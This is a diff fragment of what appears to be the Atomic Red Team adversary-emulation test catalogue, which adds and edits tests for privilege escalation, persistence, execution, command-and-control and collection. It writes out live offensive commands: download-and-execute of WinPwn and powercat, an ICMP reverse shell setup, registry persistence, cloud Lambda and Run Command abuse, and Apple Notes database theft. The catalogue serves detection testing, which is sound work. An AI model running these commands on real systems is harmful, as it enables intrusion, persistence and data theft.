-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
         name: powershell
@@ -34788,7 +35107,6 @@ privilege-escalation:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
         name: powershell
@@ -38694,47 +39012,6 @@ privilege-escalation:
           sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
           sudo rm /Library/LaunchDaemons/#{plist_filename}
           sudo rm /tmp/T1543_004_atomicredteam.txt
-    - name: Launch Daemon - Users Directory
-      auto_generated_guid: 6f899f9d-8a8e-4143-89a5-26fc2c3ec438
-      description: 'Utilize LaunchDaemon in /Users directory  to touch temporary file
-        in /tmp
-
-        '
-      supported_platforms:
-      - macos
-      input_arguments:
-        plist_filename:
-          description: filename
-          type: string
-          default: com.atomicredteam.T1543.004.plist
-        path_malicious_plist:
-          description: Name of file to store in cron folder
-          type: string
-          default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist"
-      dependency_executor_name: bash
-      dependencies:
-      - description: 'The shared library must exist on disk at specified location
-          (#{path_malicious_plist})
-
-          '
-        prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
-          1; fi;
-
-          '
-        get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
-          try again."; exit 1;
-
-          '
-      executor:
-        name: bash
-        elevation_required: true
-        command: |
-          sudo cp #{path_malicious_plist} ~/Library/LaunchDaemons/#{plist_filename}
-          sudo launchctl load -w ~/Library/LaunchDaemons/#{plist_filename}
-        cleanup_command: |-
-          sudo launchctl unload ~/Library/LaunchDaemons/#{plist_filename}
-          sudo rm ~/Library/LaunchDaemons/#{plist_filename}
-          sudo rm /tmp/T1543_004_atomicredteam.txt
   T1574.008:
     technique:
       modified: '2024-09-12T15:25:57.059Z'
@@ -43701,11 +43978,11 @@ privilege-escalation:
           default: calc
       executor:
         command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
-          /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
+          /f /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
 
           '
         cleanup_command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
-          /v StartupPrograms /t REG_SZ /d "rdpclip"
+          /f /v StartupPrograms /t REG_SZ /d "rdpclip"
         name: command_prompt
         elevation_required: true
     - name: Creating Boot Verification Program Key for application execution during
@@ -43727,6 +44004,21 @@ privilege-escalation:
 
           '
         cleanup_command: reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram
+          /f
+        name: command_prompt
+        elevation_required: true
+    - name: Add persistence via Windows Context Menu
+      auto_generated_guid: de47f4a0-2acb-416d-9a6b-cee584a4c4d1
+      description: |
+        This atomic test add persistence taking advantage of the  Windows Context Menu [Hexacorn](https://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/)
+        User have to right click on the main screen or in the white space of the opened folder (e.g. Size Modify).
+      supported_platforms:
+      - windows
+      executor:
+        command: reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Size Modify\command"
+          /ve /t REG_SZ /d "C:\Windows\System32\calc.exe" /f
+        cleanup_command: reg delete "HKEY_CLASSES_ROOT\Directory\Background\shell\Size
+          Modify" /f
         name: command_prompt
         elevation_required: true
   T1098:
@@ -43916,7 +44208,7 @@ privilege-escalation:
     - name: AWS - Create a group and add a user to that group
       auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
       description: 'Adversaries create AWS group, add users to specific to that group
-        to elevate their privilieges to gain more accesss
+        to elevate their privileges to gain more accesss
 
         '
       supported_platforms:
@@ -44802,7 +45094,7 @@ privilege-escalation:
         prereq_command: 'stat "$PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate"
 
           '
-        get_prereq_command: |-
+        get_prereq_command: |
           cd "$PathToAtomicsFolder/T1098/src/T1098-17/"
           terraform init
           terraform apply -auto-approve
@@ -50723,7 +51015,6 @@ privilege-escalation:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           obfuskittiedump -consoleoutput -noninteractive
         name: powershell
@@ -50735,7 +51026,6 @@ privilege-escalation:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           safedump -consoleoutput -noninteractive
         name: powershell
@@ -52930,7 +53220,7 @@ execution:
 
             '
           type: url
-          default: 
+          default:
         c2_parent_directory:
           description: |
             Parent directory where you have the "malicious" file on c2_domain server.
@@ -53628,7 +53918,7 @@ execution:
   T1059.010:
     technique:
       modified: '2024-04-28T15:58:48.119Z'
-      name: AutoHotKey & AutoIT
+      name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
@@ -53680,7 +53970,49 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1059.010
+    atomic_tests:
+    - name: AutoHotKey script execution
+      auto_generated_guid: 7b5d350e-f758-43cc-a761-8e3f6b052a03
+      description: 'An adversary may attempt to execute malicious script using AutoHotKey
+        software instead of regular terminal like powershell or cmd. A messagebox
+        will be displayed and calculator will popup when the script is executed successfully
+
+        '
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AutoHotKey executable file must exist on disk at the specified
+          location (#{autohotkey_path})
+
+          '
+        prereq_command: |
+          if(Test-Path "#{autohotkey_path}") {
+              exit 0
+          } else {
+              exit 1
+          }
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          $AutoHotKeyURL = "https://www.autohotkey.com/download/ahk.zip"
+          $InstallerPath = "$PathToAtomicsFolder\..\ExternalPayloads"
+          Invoke-WebRequest -Uri $AutoHotKeyURL -OutFile $InstallerPath\ahk.zip
+          Expand-Archive -Path $InstallerPath -Force;
+      input_arguments:
+        script_path:
+          description: AutoHotKey Script Path
+          type: path
+          default: PathToAtomicsFolder\T1059.010\src\calc.ahk
+        autohotkey_path:
+          description: AutoHotKey Executable File Path
+          type: path
+          default: "$PathToAtomicsFolder\\..\\ExternalPayloads\\ahk\\AutoHotKeyU64.exe"
+      executor:
+        command: 'Start-Process -FilePath "#{autohotkey_path}" -ArgumentList "#{script_path}"
+
+          '
+        name: powershell
   T1059.009:
     technique:
       modified: '2024-10-15T15:44:20.143Z'
@@ -55846,7 +56178,7 @@ execution:
       - linux
       executor:
         command: busybox sh &
-        cleanup_command: 
+        cleanup_command:
         name: sh
         elevation_required: false
     - name: emacs spawning an interactive system shell
@@ -56861,7 +57193,72 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1651
+    atomic_tests:
+    - name: AWS Run Command (and Control)
+      auto_generated_guid: a3cc9c95-c160-4b86-af6f-84fba87bfd30
+      description: 'This test simulates an adversary using the AWS Run Command service
+        to execute commands on EC2 instances.
+
+        '
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        access_key:
+          description: AWS Access Key
+          type: string
+          default: ''
+        secret_key:
+          description: AWS Secret Key
+          type: string
+          default: ''
+        session_token:
+          description: AWS Session Token
+          type: string
+          default: ''
+        profile:
+          description: AWS profile
+          type: string
+          default: ''
+        region:
+          description: AWS region to deploy the EC2 instance
+          type: string
+          default: us-east-2
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The AWS PowerShell module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name AWSPowerShell -ErrorAction
+          SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name AWSPowerShell -Force
+
+          '
+      - description: 'Terraform must be installed.
+
+          '
+        prereq_command: 'terraform --version
+
+          '
+        get_prereq_command: 'Write-Host "Terraform is required. Download it from https://www.terraform.io/downloads.html"
+
+          '
+      executor:
+        command: |
+          Import-Module "PathToAtomicsFolder/T1651/src/T1651-1/AWSSSMAttack.ps1" -Force
+          $access_key = "#{access_key}"
+          $secret_key = "#{secret_key}"
+          $session_token = "#{session_token}"
+          $aws_profile = "#{profile}"
+          $region = "#{region}"
+          Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile -AWSRegion $region
+          Invoke-Terraform -TerraformCommand init -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1"
+          Invoke-Terraform -TerraformCommand apply -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1" -TerraformVariables @("profile=T1651-1", "region=$region")
+          Invoke-SSMAttack -AWSProfile "T1651-1" -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1"
+          Invoke-Terraform -TerraformCommand destroy -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1" -TerraformVariables @("profile=T1651-1", "region=$region")
+        name: powershell
   T1059.005:
     technique:
       modified: '2024-10-15T16:43:27.104Z'
@@ -57139,7 +57536,81 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-    atomic_tests: []
+      identifier: T1648
+    atomic_tests:
+    - name: Lambda Function Hijack
+      auto_generated_guid: 87a4a141-c2bb-49d1-a604-8679082d8b91
+      description: 'Modify an existing Lambda function to execute arbitrary code.
+
+        '
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        access_key:
+          description: AWS Access Key
+          type: string
+          default: ''
+        secret_key:
+          description: AWS Secret Key
+          type: string
+          default: ''
+        session_token:
+          description: AWS Session Token
+          type: string
+          default: ''
+        profile:
+          description: AWS profile
+          type: string
+          default: ''
+        region:
+          description: AWS region to deploy the EC2 instance
+          type: string
+          default: us-east-2
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The AWS PowerShell module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name AWSPowerShell -ErrorAction
+          SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name AWSPowerShell -Force
+
+          '
+      - description: 'Terraform must be installed.
+
+          '
+        prereq_command: 'terraform --version
+
+          '
+        get_prereq_command: 'Write-Host "Terraform is required. Download it from https://www.terraform.io/downloads.html"
+
+          '
+      executor:
+        command: |
+          Import-Module "PathToAtomicsFolder/T1648/src/T1648-1/LambdaAttack.ps1" -Force
+          $access_key = "#{access_key}"
+          $secret_key = "#{secret_key}"
+          $session_token = "#{session_token}"
+          $aws_profile = "#{profile}"
+          $region = "#{region}"
+          Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile -AWSRegion $region
+          Invoke-Terraform -TerraformCommand init -TerraformDirectory "PathToAtomicsFolder/T1648/src/T1648-1"
+          Invoke-Terraform -TerraformCommand apply -TerraformDirectory "PathToAtomicsFolder/T1648/src/T1648-1" -TerraformVariables @("profile=T1648-1", "region=$region")
+          Invoke-LambdaAttack -AWSProfile "T1648-1" -AWSRegion $region
+        cleanup_command: |
+          Import-Module "PathToAtomicsFolder/T1648/src/T1648-1/LambdaAttack.ps1" -Force
+          $access_key = "#{access_key}"
+          $secret_key = "#{secret_key}"
+          $session_token = "#{session_token}"
+          $aws_profile = "#{profile}"
+          $region = "#{region}"
+          Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile -AWSRegion $region
+          Invoke-Terraform -TerraformCommand destroy -TerraformDirectory "PathToAtomicsFolder/T1648/src/T1648-1" -TerraformVariables @("profile=T1648-1", "region=$region")
+          Remove-MaliciousUser -AWSProfile "T1648-1"
+          Remove-TFFiles -Path "PathToAtomicsFolder/T1648/src/T1648-1/"
+        name: powershell
   T1204.001:
     technique:
       modified: '2024-09-10T16:40:03.786Z'
@@ -62092,7 +62563,7 @@ persistence:
           $chromium =  "https://commondatastorage.googleapis.com/chromium-browser-snapshots/Win_x64/1153778/chrome-win.zip"
 
           # uBlock Origin Lite to test side-loading
-          $extension = "https://github.com/gorhill/uBlock/releases/download/uBOLite_0.1.23.6055/uBOLite_0.1.23.6055.chromium.mv3.zip"
+          $extension = "https://github.com/uBlockOrigin/uBOL-home/releases/download/uBOLite_2024.11.25.1376/uBOLite_2024.11.25.1376.chromium.mv3.zip"
 
           Set-Location "#{working_dir}"
 
@@ -63165,47 +63636,6 @@ persistence:
           sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
           sudo rm /Library/LaunchDaemons/#{plist_filename}
           sudo rm /tmp/T1543_004_atomicredteam.txt
-    - name: Launch Daemon - Users Directory
-      auto_generated_guid: 6f899f9d-8a8e-4143-89a5-26fc2c3ec438
-      description: 'Utilize LaunchDaemon in /Users directory  to touch temporary file
-        in /tmp
-
-        '
-      supported_platforms:
-      - macos
-      input_arguments:
-        plist_filename:
-          description: filename
-          type: string
-          default: com.atomicredteam.T1543.004.plist
-        path_malicious_plist:
-          description: Name of file to store in cron folder
-          type: string
-          default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist"
-      dependency_executor_name: bash
-      dependencies:
-      - description: 'The shared library must exist on disk at specified location
-          (#{path_malicious_plist})
-
-          '
-        prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
-          1; fi;
-
-          '
-        get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
-          try again."; exit 1;
-
-          '
-      executor:
-        name: bash
-        elevation_required: true
-        command: |
-          sudo cp #{path_malicious_plist} ~/Library/LaunchDaemons/#{plist_filename}
-          sudo launchctl load -w ~/Library/LaunchDaemons/#{plist_filename}
-        cleanup_command: |-
-          sudo launchctl unload ~/Library/LaunchDaemons/#{plist_filename}
-          sudo rm ~/Library/LaunchDaemons/#{plist_filename}
-          sudo rm /tmp/T1543_004_atomicredteam.txt
   T1574.008:
     technique:
       modified: '2024-09-12T15:25:57.059Z'
@@ -67594,11 +68024,11 @@ persistence:
           default: calc
       executor:
         command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
-          /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
+          /f /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
 
           '
         cleanup_command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
-          /v StartupPrograms /t REG_SZ /d "rdpclip"
+          /f /v StartupPrograms /t REG_SZ /d "rdpclip"
         name: command_prompt
         elevation_required: true
     - name: Creating Boot Verification Program Key for application execution during
@@ -67620,6 +68050,21 @@ persistence:
 
           '
         cleanup_command: reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram
+          /f
+        name: command_prompt
+        elevation_required: true
+    - name: Add persistence via Windows Context Menu
+      auto_generated_guid: de47f4a0-2acb-416d-9a6b-cee584a4c4d1
+      description: |
+        This atomic test add persistence taking advantage of the  Windows Context Menu [Hexacorn](https://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/)
+        User have to right click on the main screen or in the white space of the opened folder (e.g. Size Modify).
+      supported_platforms:
+      - windows
+      executor:
+        command: reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Size Modify\command"
+          /ve /t REG_SZ /d "C:\Windows\System32\calc.exe" /f
+        cleanup_command: reg delete "HKEY_CLASSES_ROOT\Directory\Background\shell\Size
+          Modify" /f
         name: command_prompt
         elevation_required: true
   T1136.003:
@@ -67828,7 +68273,7 @@ persistence:
           = \"#{username}\"      \n$password = \"#{password}\"\naz ad user create
           --display-name $username --password $password --user-principal-name $userprincipalname\naz
           ad user list --filter \"displayname eq 'atomicredteam'\"     "
-        cleanup_command: az ad user delete --id
+        cleanup_command: az ad user delete --id "#{userprincipalname}"
         name: powershell
   T1098:
     technique:
@@ -68017,7 +68462,7 @@ persistence:
     - name: AWS - Create a group and add a user to that group
       auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
       description: 'Adversaries create AWS group, add users to specific to that group
-        to elevate their privilieges to gain more accesss
+        to elevate their privileges to gain more accesss
 
         '
       supported_platforms:
@@ -68903,7 +69348,7 @@ persistence:
         prereq_command: 'stat "$PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate"
 
           '
-        get_prereq_command: |-
+        get_prereq_command: |
           cd "$PathToAtomicsFolder/T1098/src/T1098-17/"
           terraform init
           terraform apply -auto-approve
@@ -74987,7 +75432,6 @@ persistence:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           obfuskittiedump -consoleoutput -noninteractive
         name: powershell
@@ -74999,7 +75443,6 @@ persistence:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           safedump -consoleoutput -noninteractive
         name: powershell
@@ -76480,7 +76923,7 @@ command-and-control:
         MSP360_Download_Url:
           description: URL to download MSP360 Connect from
           type: url
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'MSP360 must exist at (#{MSP360_Connect_Path})
@@ -76584,6 +77027,17 @@ command-and-control:
           Remote\Server\#{srserver_exe}"
         name: powershell
         elevation_required: true
+    - name: Microsoft App Quick Assist Execution
+      auto_generated_guid: 1aea6d15-70f1-4b4e-8b02-397b5d5ffe75
+      description: "An adversary may attempt to trick a user into executing Microsoft
+        Quick Assist Microsoft Store app and connect to the user's machine. \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: Start-Process "shell:AppsFolder\MicrosoftCorporationII.QuickAssist_8wekyb3d8bbwe!App"
+        cleanup_command: Stop-Process -Name quickassist
+        name: powershell
+        elevation_required: true
   T1659:
     technique:
       modified: '2023-10-01T02:28:45.147Z'
@@ -76959,6 +77413,124 @@ command-and-control:
           Remove-Item C:\%userprofile%\AppData\Local\ngrok -ErrorAction Ignore
         name: powershell
         elevation_required: true
+    - name: Microsoft Dev tunnels (Linux/macOS)
+      auto_generated_guid: 9f94a112-1ce2-464d-a63b-83c1f465f801
+      description: |
+        Dev Tunnels enables insiders as well as threat actors to expose local ports over the internet via Microsoft dev tunnels.
+
+        This atomic will generate a dev tunnel binding it to the local service running on the provided port. Can be used to expose local services, web applications and local files etc.
+        Reference:
+        - [Microsoft Docs](https://learn.microsoft.com/en-us/tunnels/dev-tunnels-overview)
+        - [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/devtunnels/)
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        port:
+          description: port number for tunnel
+          type: integer
+          default: 8080
+        download_url:
+          description: link to download devtunnel
+          type: string
+          default: https://aka.ms/TunnelsCliDownload/linux-x64
+        binary_path:
+          description: path to download devtunnel
+          type: string
+          default: PathToAtomicsFolder/../ExternalPayloads/devtunnel
+      dependencies:
+      - description: 'Download devtunnel
+
+          '
+        prereq_command: 'test -f #{binary_path}
+
+          '
+        get_prereq_command: |
+          mkdir -p $(dirname #{binary_path})
+          curl -L "#{download_url}" -o "#{binary_path}"
+          chmod +x #{binary_path}
+      - description: 'Login to Microsoft Dev tunnels
+
+          '
+        prereq_command: '#{binary_path} user show | grep -q "Not logged in" && exit
+          1 || exit 0
+
+          '
+        get_prereq_command: 'echo "Login to devtunnel using the following command:
+          #{binary_path} user login"
+
+          '
+      executor:
+        command: "#{binary_path} host -p #{port} &\n"
+        cleanup_command: |
+          pkill -9 $(basename "#{binary_path}")
+          #{binary_path} user logout
+          rm #{binary_path}
+        name: bash
+    - name: VSCode tunnels (Linux/macOS)
+      auto_generated_guid: b877943f-0377-44f4-8477-f79db7f07c4d
+      description: |
+        Visual Studio Code Remote Tunnels can be used for exposing local development environment/services/files over the internet.
+        This atomic will generate a dev tunnel binding it to the local service running on the provided port.
+        Reference:
+        - [Microsoft Docs](https://code.visualstudio.com/docs/remote/tunnels)
+        - [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/vscode-server/)
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        artifact_base_url:
+          description: Base URL to download code-cli
+          type: string
+          default: https://code.visualstudio.com/sha/download
+        artifact_build:
+          description: build to download - Allowed values (stable/insiders)
+          type: string
+          default: stable
+        payload_path:
+          description: path to download code-cli
+          type: string
+          default: PathToAtomicsFolder/../ExternalPayloads
+        additional_args:
+          description: additional arguments to pass to code tunnel
+          type: string
+          default: ''
+      dependencies:
+      - description: 'Install code-cli
+
+          '
+        prereq_command: 'which code
+
+          '
+        get_prereq_command: "ARCH_SUFFIX=$(uname -m | grep -q \"arm64\\|aarch64\"
+          && echo \"arm64\" || echo \"x64\")\nif [ \"$(uname)\" = \"Darwin\" ]\nthen
+          brew install code-cli\nelif [ \"$(expr substr $(uname) 1 5)\" = \"Linux\"
+          ]\nthen mkdir -p $(dirname #{payload_path})        \n  PKG_TYPE=$(command
+          -v apt >/dev/null && echo \"deb\" || echo \"rpm\")\n  curl -L \"#{artifact_base_url}?build=#{artifact_build}&os=linux-${PKG_TYPE}-${ARCH_SUFFIX}\"
+          -o \"#{payload_path}/code.${PKG_TYPE}\"\n  (which apt && apt install -y
+          \"#{payload_path}/code.${PKG_TYPE}\") || (which yum && yum install -y \"#{payload_path}/code.${PKG_TYPE}\")\n
+          \ rm \"#{payload_path}/code.${PKG_TYPE}\"\nfi\n"
+      - description: 'Login to VSCode Dev tunnels
+
+          '
+        prereq_command: 'code tunnel user show | grep -q "not logged in" && exit 1
+          || exit 0
+
+          '
+        get_prereq_command: 'echo "Login to code tunnel using the following command:
+          code tunnel user login"
+
+          '
+      executor:
+        command: 'nohup code tunnel --accept-server-license-terms #{additional_args}
+          >/dev/null 2>&1 &
+
+          '
+        cleanup_command: |
+          pkill -9 tunnel
+          code tunnel unregister
+          code tunnel user logout
+        name: sh
   T1071.003:
     technique:
       modified: '2024-04-16T12:28:59.928Z'
@@ -78291,6 +78863,33 @@ command-and-control:
           IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
           powercat -c #{server_ip} -p #{server_port}
         name: powershell
+    - name: Linux ICMP Reverse Shell using icmp-cnc
+      auto_generated_guid: 8e139e1f-1f3a-4be7-901d-afae9738c064
+      description: |
+        ICMP C2 (Command and Control) utilizes the Internet Control Message Protocol (ICMP), traditionally used for network diagnostics, as a covert communication channel for attackers. By using ICMP, adversaries can send commands, exfiltrate data, or maintain access to compromised systems without triggering network detection systems.
+        This method allows attackers to communicate and control compromised devices while remaining undetected.
+
+        For more details, check this blog: [ICMP Reverse Shell Blog](https://cryptsus.com/blog/icmp-reverse-shell.html)
+
+        **Important Notes:**
+        - Use `[icmp-cnc]` for the C2 server (Attacker) and `[icmpdoor]` for the C2 client (Victim).
+        - Binaries work on Ubuntu 22.04.5 LTS; for CentOS Stream or other, use the Python file from the GitHub link [https://github.com/krabelize/icmpdoor].
+        - Root access is required.
+      supported_platforms:
+      - linux
+      executor:
+        steps: "1. Run the following command on both the attacker and victim machines
+          to download the required binaries.\n\n    mkdir -p /tmp/icmpdoor && wget
+          -P /tmp/icmpdoor https://github.com/krabelize/icmpdoor/raw/2398f7e0b8548d8ef2891089e4199ee630e84ef6/binaries/x86_64-linux/icmp-cnc
+          https://github.com/krabelize/icmpdoor/raw/2398f7e0b8548d8ef2891089e4199ee630e84ef6/binaries/x86_64-linux/icmpdoor
+          && chmod +x /tmp/icmpdoor/icmp-cnc /tmp/icmpdoor/icmpdoor && echo 'export
+          PATH=$PATH:/tmp/icmpdoor' >> ~/.bashrc && source ~/.bashrc\n\n2. Start the
+          C2 server on the attacker system to listen for incoming connections.\n\n
+          \   icmp-cnc --interface <Network Interface> --destination_ip <VICTIM-IP>\n\n3.
+          Run the client on the victim machine.\n\n    icmpdoor --interface <Network
+          Interface> --destination_ip <ATTACKER-IP>\n  \n4. Cleanup Command: Remove
+          the icmpdoor directory.\n\n    rm -rf /tmp/icmpdoor\n"
+        name: manual
   T1001.003:
     technique:
       modified: '2024-10-09T15:40:19.436Z'
@@ -80252,9 +80851,12 @@ command-and-control:
           {exit 0}
           }
         get_prereq_command: "Write-Output \"Generating random passwords and saving
-          to file...\"\n$passwords = 1..10 | ForEach-Object { Get-Random -InputObject
-          ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?')
-          -Count 12 }\n$passwords | Out-File -FilePath \"#{passwords_file}\"    \n"
+          to file...\"\n$passwords = 1..10 | ForEach-Object { -join ((1..12) | ForEach-Object
+          { @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z')
+          + @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z')
+          + @('0','1','2','3','4','5','6','7','8','9') + @('!','@','#','$','%','^','&','*','(','(',')','-','=','+','_','[',']','{','}','|',';',';',':',',','<','>','?')
+          | Get-Random }) }\n$passwords | Out-File -FilePath \"#{passwords_file}\"
+          \   \n"
       - description: "Tarz file to embed in image must exist \n"
         prereq_command: |
           if (!(Test-Path "#{tar_file}")) {exit 1} else {
@@ -81506,7 +82108,7 @@ collection:
       - windows
       executor:
         command: |
-          reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 1 /f
+          reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 0 /f
           reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /f
         cleanup_command: 'reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI"
           /v DisableAIDataAnalysis /t REG_DWORD /d 1 /f
@@ -83075,11 +83677,11 @@ collection:
         container_name:
           description: Container name to search for (optional)
           type: string
-          default: 
+          default:
         blob_name:
           description: Blob name to search for (optional)
           type: string
-          default: 
+          default:
       executor:
         command: |
           try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
@@ -83327,6 +83929,30 @@ collection:
           find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
         cleanup_command: "rm -f $HOME/.art\nrm -f $HOME/gta.db\nrm -f $HOME/sqlite_dump.sh
           \n"
+    - name: Copy Apple Notes database files using AppleScript
+      auto_generated_guid: cfb6d400-a269-4c06-a347-6d88d584d5f7
+      description: 'This command will copy Apple Notes database files using AppleScript
+        as seen in Atomic Stealer.
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        destination_path:
+          description: Specify the path to copy the database files into.
+          type: path
+          default: "/private/tmp"
+      executor:
+        command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath
+          to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to
+          home folder as text) & "Library:Group Containers:group.com.apple.notes:"'
+          -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file
+          "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"}
+          of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile
+          to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
+        cleanup_command: rm "#{destination_path}/NoteStore.sqlite*"
+        name: sh
+        elevation_required: false
   T1560.002:
     technique:
       x_mitre_platforms:
@@ -83518,9 +84144,9 @@ collection:
       executor:
         name: sh
         elevation_required: false
-        command: "which_python=`which python || which python3`\n$which_python -c \"from
